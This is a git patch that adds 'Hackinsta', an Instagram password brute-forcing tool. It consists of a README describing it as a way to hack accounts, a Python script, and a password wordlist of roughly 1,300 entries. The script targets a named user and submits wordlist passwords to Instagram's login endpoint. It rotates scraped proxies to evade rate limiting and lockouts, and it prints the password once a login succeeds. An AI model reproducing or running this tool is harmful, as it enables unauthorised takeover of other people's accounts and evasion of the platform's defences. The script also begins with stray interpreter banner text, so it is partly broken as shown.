From faae626ad354df561131f8d5ae4a4696db633916 Mon Sep 17 00:00:00 2001 From: alireza310 <53456021+alireza310@users.noreply.github.com> Date: Sat, 3 Aug 2019 22:36:35 +0430 Subject: [PATCH 1/2] Add files via upload --- README.md | 11 + hackinsta.py | 175 +++++++ passwords.txt | 1304 +++++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 1490 insertions(+) create mode 100644 README.md create mode 100644 hackinsta.py create mode 100644 passwords.txt diff --git a/README.md b/README.md new file mode 100644 index 0000000..81306c5 --- /dev/null +++ b/README.md @@ -0,0 +1,11 @@ +# Hackinsta +using Bruteforce we can hack instagram account +things need to be done +first of all install these modules in system +command : +pip install argparse requests PySocks asyncio proxybroker + + + now run the script + eg: python hackinsta.py Username passwords.txt + diff --git a/hackinsta.py b/hackinsta.py new file mode 100644 index 0000000..454ccd4 --- /dev/null +++ b/hackinsta.py @@ -0,0 +1,175 @@ +Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32 +Type "copyright", "credits" or "license()" for more information. +>>> import argparse +import requests +import os +import codecs + +import socket +import socks + +import asyncio +from proxybroker import Broker + +import time +import sys +import datetime + +DELAY_BETWEEN = 4 + +#args parser +parser = argparse.ArgumentParser() +parser.add_argument('username', help='Instagram username of the user you want to attack') +parser.add_argument('passwords_file', help='A passwords file for the software') +args = parser.parse_args() +if not os.path.exists(args.passwords_file): + exit('[*] Sorry, can\'t find file named "%s"' % args.passwords_file) + +#help functions +#remove empty lines and duplicates +def cleanList(items): + newList = [] + for x in items: + if not (x == None or x == ''): + if not x in newList: + newList.append(x) + return newList + +#countdown function +def countdown(t): + for remaining in range(t, 0, -1): + sys.stdout.write('\r') + remaining = datetime.timedelta(seconds=remaining) + h = int(remaining.total_seconds() / 3600) + m = int(remaining.total_seconds() / 60) % 60 + remaining = str(remaining) + timeUnit = 'seconds' + if (m > 0): timeUnit = 'minutes' + if (h > 0): timeUnit = 'hours' + sys.stdout.write("[BREAK] {:2s} {:2s} remaining".format(remaining,timeUnit)) + sys.stdout.flush() + time.sleep(1) + print ('') + +#get all proxy +proxies_list = [] +async def proxything(proxies): + print ('[*] Loading proxies') + while True: + proxy = await proxies.get() + if proxy is None: break + try: + requests.get('https://www.instagram.com/') + proxies_list.append(proxy) + except Exception as e: + continue + +proxies = asyncio.Queue() +asyncio.get_event_loop().run_until_complete(asyncio.gather(Broker(proxies).find(types=['HTTPS', 'HTTP'], limit=20), proxything(proxies))) +#find proxy +def setProxy(): + for proxy in proxies_list: + print('[*] Proxy: %s' % proxy) + proxies_list.remove(proxy) + return True + + + +#main class - Instagram bruteforce +class Instabrute(): + def __init__(self, username, passwords): + self.username = username + if not self.userExists(): + exit('[*] Can\'t find user named "%s"' % self.username) + + self.passwords = passwords + + self.attempts = 0 + + def userExists(self): + r = requests.get('https://www.instagram.com/%s/?__a=1' % self.username) + if r.status_code == 404: + return False + elif r.status_code == 200: + return True + else: + return False + + def _next(self): + if self.attempts % 15 == 0 and self.attempts != 0: + print ('[*] We need to change proxy :-)') + setProxy() + #add 1 attempt to the counter + self.attempts += 1 + #remove the first password (the current) + self.passwords.pop(0) + #try the next password + self.login() + + def login(self): + sess = requests.Session() + + #requests headers and cookies + sess.cookies.update ({'sessionid' : '', 'mid' : '', 'ig_pr' : '1', 'ig_vw' : '1920', 'csrftoken' : '', 's_network' : '', 'ds_user_id' : ''}) + sess.headers.update({ + 'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36', + 'x-instagram-ajax':'1', + 'X-Requested-With': 'XMLHttpRequest', + 'origin': 'https://www.instagram.com', + 'ContentType' : 'application/x-www-form-urlencoded', + 'Connection': 'keep-alive', + 'Accept': '*/*', + 'Referer': 'https://www.instagram.com', + 'authority': 'www.instagram.com', + 'Host' : 'www.instagram.com', + 'Accept-Language' : 'en-US;q=0.6,en;q=0.4', + 'Accept-Encoding' : 'gzip, deflate' + }) + + #update csrf token for the first time + sess.headers.update({'X-CSRFToken' : sess.get('https://www.instagram.com/').cookies.get_dict()['csrftoken']}) + + #try to login + r = sess.post('https://www.instagram.com/accounts/login/ajax/', data={ + 'username':self.username, + 'password':self.passwords[0] + }, allow_redirects=True) + + if 'authenticated' in r.text: + if r.json()['authenticated']: + exit('[%s] Yay, the password is "%s"' % (str(self.attempts+1), self.passwords[0])) + #update csrf token after login try (if you want to keep the session) + #sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']}) + else: + print ('[%s] Can\'t login with "%s"' % (str(self.attempts+1), self.passwords[0])) + + time.sleep(DELAY_BETWEEN) + + #try the next password + self._next() + else: + if 'message' in r.text: + if r.json()['message'] == 'Please wait a few minutes before you try again.': + print ('[MESSAGE] Please wait a few minutes before you try again.') + countdown(60*15) + setProxy() + pass #Do you want to wait or use proxy? + elif r.json()['message'] == 'checkpoint_required': + exit('[%s] Yay, the password is "%s"' % (str(self.attempts+1), self.passwords[0])) + else: + print ('[MESSAGE] %s' % r.json()['message']) + else: + print (r.text) + +setProxy() +#main action +with codecs.open(args.passwords_file, 'r', 'utf-8') as file: + passwords = file.read().splitlines() + if len(passwords) < 1: + exit('[*] The file is empty') + else: + passwords = cleanList(passwords) + print ('[*] %s passwords loaded successfully' % len(passwords)) + +bruteforce = Instabrute(args.username, passwords) +bruteforce.login() diff --git a/passwords.txt b/passwords.txt new file mode 100644 index 0000000..797de6b --- /dev/null +++ b/passwords.txt @@ -0,0 +1,1304 @@ +1234 + +102030 +123 +1234 +12345 +123456 +1234567 +12345678 +123456789 +1234567890 +12345678910 +1234567891011 +987654321 +9876543210 +0987654321 +0123456789 +1234567890 +0987654321 +0987654321 +1234567890 +1234567890 +11223355 +11 +101010 +111 +1111 +11111 +111111 +1111111 +11111111 +111111111 +1111111111 +22 +222 +2222 +22222 +222222 +2222222 +22222222 +222222222 +2222222222 +33 +333 +3333 +33333 +333333 +3333333 +33333333 +333333333 +3333333333 +44 +444 +4444 +44444 +444444 +4444444 +444444444 +4444444444 +55 +555 +5555 +55555 +555555 +5555555 +55555555 +555555555 +5555555555 +66 +666 +6666 +66666 +666666 +6666666 +66666666 +666666666 +6666666666 +77 +777 +7777 +77777 +777777 +7777777 +77777777 +777777777 +7777777777 +99 +999 +9999 +99999 +999999 +9999999 +99999999 +999999999 +9999999999 +00 +000 +0000 +00000 +000000 +0000000 +00000000 +000000000 +0000000000 +0011 +1100 +001122 +00112233 +0011223344 +001122334455 +00112233445566 +0011223344556677 +001122334455667788 +00112233445566778899 +00123456789 +007007 +700700 +109876543210 +10987654321 +987654321 +87654321 +7654321 +654321 +543210 +54321 +432100 +123456789 +789456 +456789 +123789 +123567 +321987 +321456987 +123654798 +987465321 +admin +administator +Abcdefg +!@#$%^& +1q2w3e +1234qwer +123qweasd +12345qwertasdfg +QWERTasdfg +password +passwd +001 +0012 +00123 +001234 +0012345 +00123456 +00123456789 +123321 +12321 +123454321 +12345654321 +1122333445566778899 +1122334455667788 +11223344556677 +112233445566 +1122334455 +11223344 +112233 +122333444455555 +0112233 +01223344 +1a2s3d +a1s2d3 +q1w2e3 +1q2w3e +1z2x3c +z1x2c3 +321ewq +321dsa +321cxz +543dsa +ewq321 +ewq987 +a4s5d6 +z1x2c3 +qwe123 +qwe789 +123qwe +789qwe +asd123 +123asd +asd456 +456asd +zxc123 +123zxc +123qwe +qwe123 +qaz741 +741qaz +zaq147 +147zaq +1qaz +zaq1 +123qweasdzxc +123qweasd +1234qwer +12345qwert +qwert12345 +123456qwerty +hgvdhq +hgpshf +i[,gi +hgfhsf,v] +123123 +123123123 +123321123321 +123654789 +0123654789 +1236547890 +admin +10203040 +1020304050 +102030405060 +10203040506070 +1020304050607080 +102030405060708090 +100100 +100200 +100200300 +100200300400 +100200300400500 +100200300400500600 +001002003 +121212 +212121 +101010 +010101 +050505 +505050 +202020 +205020 +123456z +123456x +123456c +123456v +123456b +123456n +123456m +123456a +123456s +123456d +123456f +123456g +123456h +123456j +123456k +123456l +123456q +123456w +123456e +123456r +123456t +123456y +123456u +123456i +123456o +123456p +12345z +12345x +12345c +12345v +12345b +12345n +12345m +12345a +12345s +12345d +12345f +12345g +12345h +12345j +12345k +12345l +12345q +12345w +12345e +12345r +12345t +12345y +12345u +12345i +12345o +12345p +z123456 +x123456 +c123456 +v123456 +b123456 +n123456 +m123456 +a123456 +23456 +d123456 +f123456 +g123456 +h123456 +j123456 +k123456 +l123456 +q123456 +w123456 +e123456 +r123456 +t123456 +y123456 +u123456 +i123456 +o123456 +p123456 +z12345 +x12345 +c12345 +v12345 +b12345 +n12345 +m12345 +a12345 +2345 +d12345 +f12345 +g12345 +h12345 +j12345 +k12345 +l12345 +q12345 +w12345 +e12345 +r12345 +t12345 +y12345 +u12345 +i12345 +o12345 +p12345 +123321123 +123321 +123!@# +123321!@##@! +123!@#321#@! +!@#123 +asd!@# +!@#qwe +qwe!@# +!@#QWE +!@#ASD +asd!@# +ASD!@# +1236541 +123654 +123698745 +123654789 +7410 +74100 +741000 +0147 +00147 +000147 +123123123123 +123123 +123321123321 +123321 +147852 +147258 +101010 +909090 +2000 +2001 +2002 +2003 +2004 +2005 +2006 +2007 +2009 +2010 +2011 +2012 +2082 +121212 +212121 +101010 +010101 +050505 +505050 +!!!!!! +@@@@@@ +###### +$$$$$$ +*6>@7Kf( +DFgrfgrf +lsjvjdl, +agzcom +123123123 +123123123123 +123123123123123 +123321 +1234567890 +7676743322 +123456 +12344321 +123451234 +1234123 +{Nw%!2UK48ED2125487 +1234567 +O0%9k^7sEMGT*M +12345678 +12131415 +1234512345 +1234554321 +121212 +111222333 +xx_37c_sd +112233 +111122223333 +1122334455 +112233445566 +11223344556677 +1122334455667788 +112233445566778899 +11223344 +11111 +111111 +1111111 +11111111 +111111111 +1111111111 +11111111111 +111111111111 +10203040 +1020304050 +102030405060 +10203040506070 +1020304050607080 +102030405060708090 +100100 +100200 +100200300 +100200300400 +100200300400500 +100200300400500600 +100000 +222222 +333333 +444444 +555555 +666666 +777777 +888888 +999999 +000000 +00000000 +007007 +098765 +0987654321 +987654321 +87654321 +5678956789 +789456 +7777777 +88888888 +99999999 +1236547 +654321 +02587410 +987456321 +789654123 +951753 +753951 +85208520 +9425111 +4580456 +0666979 +44r35e4t +RTThmwjrl +13102001 +aaswee +admin +administator +Abcdefg +!@#$%^& +1q2w3e +1234qwer +123qweasd +12345qwertasdfg +QWERTasdfg +qwertyuiop[] +1234567890-= +=-0987654321 +=-098][poi +54321trewq +!@#$%^&*()_+ +!@#$%!@#$% +!@#$%QWERT +qwertyuiasdfghj +asdfghjkl;' +zxcvbnm,./ +1qaz2wsx +12qwaszx +password +passwd +acknowledgeable +anthropomorphic +autosuggestible +autotransformer +chloroplatinate +circumferential +circumscription +complementarity +complementation +contemporaneous +counterargument +counterproposal +crystallography +decipherability +electrophoresis +entrepreneurial +experimentation +extracurricular +extralinguistic +heterostructure +incommensurable +incomprehension +inconsequential +instrumentation +jurisprudential +****mathematics +neoconservative +neurophysiology +notwithstanding +parasympathetic +parliamentarian +physiotherapist +plenipotentiary +psychotherapist +quasicontinuous +quasistationary +straightforward +substitutionary +synchronization +telecommunicate +telephotography +teletypesetting +transplantation +trichloroacetic +trichloroethane +abductors +abducts +abeam +abecedarian +abecedarians +abed +abele +abeles +abelia +abelian +abelias +abelmosk +abelmosks +aberdeen +aberrance +aberrances +aberrancies +aberrancy +aberrant +aberrantly +aberrants +aberrated +aberration +aberrational +aberrations +abet +abetment +abetments +abets +abettal +abettals +abetted +abetter +abetters +abetting +abettor +abettors +abeyance +abeyances +abeyancies +abeyancy +abeyant +abfarad +abfarads +abhenries +abhenry +abhenrys +abhor +abhorred +abhorrence +abhorrences +abhorrent +abhorrently +abhorrer +abhorrers +vv_dbs_la +abhorring +abhors +abidance +abidances +abide +abided +abider +abiders +abides +abiding +abidingly +abidingness +abigail +abigails +abilene +abilities +ability +abiogeneses +abiogenesis +abiogenic +abiogenically +abiogenist +abiogenists +abiological +abioses +abiosis +abiotic +abiotically +abject +abjection +abjections +abjectly +abjectness +abjectnesses +abjuration +abjurations +abjuratory +abjure +abjured +abjurer +abjurers +abjures +abjuring +ablate +ablated +ablates +ablating +ablation +ablations +ablatival +ablative +ablatively +ablatives +ablaut +ablauts +ablaze +able +ablegate +ablegates +ableness +abler +ables +ablest +ablings +ablins +abloom +abluent +abluents +ablush +abluted +ablution +ablutionary +ablutions +ably +abmho +abmhos +abnegate +abnegated +abnegates +abnegating +abnegation +abnegations +abnegator +abnegators +abner +abnormal +abnormalities +abnormality +abnormally +abnormals +abo +aboard +abode +aboded +abodes +aboding +abohm +abohms +aboideau +aboideaus +aboideaux +aboil +aboiteau +aboiteaus +aboiteaux +abolish +abolishable +abolished +abolisher +abolishers +abolishes +abolishing +abolishment +abolishments +abolition +abolitionary +abolitionism +abolitionisms +abolitionist +abolitionists +abolitions +abolla +abollae +aboma +abomas +abomasa +abomasal +abomasi +abomasum +abomasus +abominable +abominably +abominate +abominated +abominates +abominating +abomination +abominations +abominator +abominators +aboon +aboral +aborally +aboriginal +aboriginally +aboriginals +aborigine +aborigines +aborning +abort +aborted +aborter +aborters +abortifacient +abortifacients +aborting +abortion +abortional +abortionist +abortionists +abortions +fhgfdtg +5482325347^$#@@ +%&^*^%^%$#% +@#$%^%$&^ +@!~!@ +#!@#!~@#~ +^%*((&*( +^&%$%@##~!@FDJ +@!$#@%^&*^( +(*&(^$!@#@# +%^%*&)(*) +&^*&%$@#!@# +@!#@^*&)(* +^&^UYHRT^ +@!#~!W@!R +#@$@#E@!~#E +@#$%#T^Y& +54654^T$$#^$% +RTRY%^&^%&Y +24g4f54ty +ty864y6y+ +tryt9yt +ty4597y +tyt79 +dfdsrfes%$^%*&^( +@!#@#%^&(* +121212 +212121 +101010 +010101 +050505 +505050 +111111 +222222 +333333 +666666 +555555 +444444 +777777 +888888 +999999 +123456z +123456x +123456c +123456v +123456b +123456n +123456m +123456a +123456s +123456d +123456f +123456g +123456h +123456j +123456k +123456l +123456q +123456w +123456e +123456r +123456t +123456y +123456u +123456i +123456o +123456p +123123 +12345z +12345x +12345c +12345v +12345b +12345n +12345m +12345a +12345s +12345d +12345f +12345g +12345h +12345j +12345k +12345l +12345q +12345w +12345e +12345r +12345t +12345y +12345u +12345i +12345o +12345p +zxcvbn +asdfgh +qwerty +zxc123 +asd123 +qwe123 +zxcvbnm +asdfghjkl +qwertyuiop +147258 +456789 +0123456789 +012345 +0123456 +6543210 +101010 +1020 +10 +1010 +20 +30 +2020 +3030 +0123 +01234 +123123 +321321 +112233 +332211 +121212 +212121 +2121 +prorat +pro +050 +12345 +abc123 +password +passwd +123456 +010101 +01010101 +10101010 +101010 +admin +1010101 +10101010 +101010 +19701970 +1970 +19711971 +1971 +19721972 +1972 +19731973 +1973 +19741974 +1974 +19751975 +1975 +19761976 +1976 +19771977 +1977 +19781978 +1978 +19791979 +1979 +19801980 +1980 +19811981 +1981 +19821982 +1982 +19831983 +1983 +19841984 +1984 +19851985 +1985 +2000 +2005 +2001 +2003 +2002 +2004 +12345678910 +1234567890 +123456789 +12345678 +1234567 +12345 +1234 +123 +12 +1 +5110 +1122 +2211 +0011 +1100 +123123 +1212 +2121 +0101 +1010 +741852963 +147258369 +159357 +357159 +13579 +2468 +246810 +1 +11 +111 +1111 +11111 +111111 +1111111 +11111111 +2 +22 +222 +2222 +22222 +222222 +2222222 +22222222 +3 +33 +333 +3333 +33333 +333333 +3333333 +33333333 +4 +44 +444 +4444 +44444 +444444 +4444444 +444444444 +5 +55 +555 +5555 +55555 +555555 +5555555 +55555555 +6 +66 +666 +6666 +66666 +666666 +6666666 +66666666 +7 +77 +777 +7777 +77777 +777777 +7777777 +77777777 +8 +88 +888 +8888 +88888 +888888 +8888888 +88888888 +9 +99 +999 +9999 +99999 +999999 +9999999 +99999999 +0 +00 +000 +0000 +00000 +000000 +0000000 +00000000 +101010 +1020 +10 +1010 +20 +30 +2020 +3030 +0123 +01234 +123123 +321321 +112233 +332211 +121212 +212121 +21211022 +10sne1 +111111 +121212 +1225 +123 +123123 +1234 +12345 +123456 +1234567 +12345678 +123456789 +1234qwer +123abc +123go +1313 +131313 +13579 +14430 +1701d +1928 +1951 +199220706 +1a2b3c +1p2o3i +1q2w3e +1qw23e +1sanjose +2 +20 +2000 +2001 +2002 +2003 +2112 +21122112 +2222 +246 +249 +2welcome +369 +4444 +4runner +5252 +54321 +5555 +5683 +6071992 +654321 +666666 +6969 +696969 +7 +7007 +777 +7777 +80486 +8675309 +888888 +90210 +911 +92072 +99999999 + + +@#$`^& +a +a&m +a&p +a's +a12345 +a1b2c3 +a1b2c3d4 +aa +aaa +aaaaaa +aaas +aal +aalii +00 +00-08-A +000 +000 +0000 +00000 +000000 +0000000 +00000000 +000000009 +000000011 +00000040 +0000007 +0000019 +000007 +00001111 +00001969 +00007 +0000qw +0001000 +000111 +000134 +000153 +0002006 +000249 +000571 +000925 +0009732 +000ersin +001001 +0010068163 +001071 +001100 +001122 +00119945 +0012345 +001239 +00130013 +001301 +00132580 +001453 +00174800 +0018754 +001926 +0019800840 +00198800 +001989 +001991 +001992 +001995 +002006 +0020134537 +0020602060 +002200 +002233 +0025014 +002731186 +002758 +002929 +0034 +003400 +003487 +00376370 +003a9cd5 +004063 +004455q +0047204 +00531531 +0053695 +00561100 +0066789 +007 +007007 +00720072 +007d8sa7 +0080 +009 +00931687 +00950e +0096341 +00967515 +00alero +00bond +00bouer +00hasi00 +01 +0101 +010101 +01010202 +01011970 +01011985 +01011988 +0101239034 +010136 +0101991336 +0101rojo +010201023 +010203 +010205 +01021975 +01022837 +0103060120 +01031975 +01036392 +010376 +0103775433 +010403 +01041958 +rttr32rt +43534251 +34$%^^&^ +@#@!32 +^&3365 +@#!3 +WQEQEWQR#$#& +#@$#%GVGGH%^Y +^$%^TYTRYT +%$^5565+69+ +$##$#^$& +553214y54 +$%$#%%^%$^324 +Yr1D73A$h{-K +aTh5Dw,R+NT1 +xxxx +xxxxx +xxxxxx +xxxxxxx +xxx +x1x2x3x4 +x00x55x00 +xx0011xx +147896321 +1598753 +123578951 +145632587 +123654789 +12304789 +!!!!!! +@@@@@@ +###### +$$$$$$ +!q@w#e$r +564875146 +48489748 +5989865563 +9895695696 +9898796569 +4987876989 +7899485648 +485785 +64897986545 +4878458468 From 06633fde488ee9855d9b77fbdb963c84d8b0f96a Mon Sep 17 00:00:00 2001 From: alireza310 <53456021+alireza310@users.noreply.github.com> Date: Sat, 3 Aug 2019 22:39:50 +0430 Subject: [PATCH 2/2] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 81306c5..01973ff 100644 --- a/README.md +++ b/README.md @@ -8,4 +8,10 @@ pip install argparse requests PySocks asyncio proxybroker now run the script eg: python hackinsta.py Username passwords.txt + $ git clone https://github.com/alireza310/Hackinstagram +> Cloning into `alireza310/Hackinstagram`... +> remote: Counting objects: 10, done. +> remote: Compressing objects: 100% (8/8), done. +> remove: Total 10 (delta 1), reused 10 (delta 1) +> Unpacking objects: 100% (10/10), done